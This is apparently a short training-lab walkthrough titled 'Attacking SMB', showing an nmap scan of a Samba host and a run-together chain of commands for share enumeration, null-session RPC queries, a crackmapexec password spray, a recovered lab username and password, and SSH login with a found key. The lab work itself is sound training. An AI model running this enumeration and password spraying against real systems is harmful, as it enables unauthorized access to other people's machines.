Attacking SMB
May 21, 2024
Last updated
May 21, 2024
Last updated
# Nmap 7.94 scan initiated Wed May 22 13:28:36 2024 as: nmap -sC -sV -oN nmap-smb -p 445 -vv 10.129.251.246
Nmap scan report for 10.129.251.246
Host is up, received conn-refused (0.32s latency).
Scanned at 2024-05-22 13:28:36 PST for 14s
PORT STATE SERVICE REASON VERSION
445/tcp open netbios-ssn syn-ack Samba smbd 4.6.2
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| nbstat: NetBIOS name: ATTCSVC-LINUX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| ATTCSVC-LINUX<00> Flags: <unique><active>
| ATTCSVC-LINUX<03> Flags: <unique><active>
| ATTCSVC-LINUX<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
| 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_ 00:00:00:00:00:00:00:00:00:00:00:00:00:00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 10995/tcp): CLEAN (Couldn't connect)
| Check 2 (port 62584/tcp): CLEAN (Couldn't connect)
| Check 3 (port 52666/udp): CLEAN (Failed to receive data)
| Check 4 (port 24096/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2024-05-22T05:28:54
|_ start_date: N/A
|_clock-skew: 7s
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 22 13:28:50 2024 -- 1 IP address (1 host up) scanned in 14.06 secondssmbclient -L 10.129.251.246smbclient \\\\10.129.251.246\\GGJsmbmap -H 10.129.251.246 -r GGJrpcclient -U'%' 10.129.251.246poetry run crackmapexec smb 10.129.251.246 -u users.list -p pws.list --local-authjason:34c8zuNBo91!@28Bszhsmbclient -U jason \\\\10.129.251.246\\GGJchmod 600 id_rsa
ssh -i id_rsa john@IP
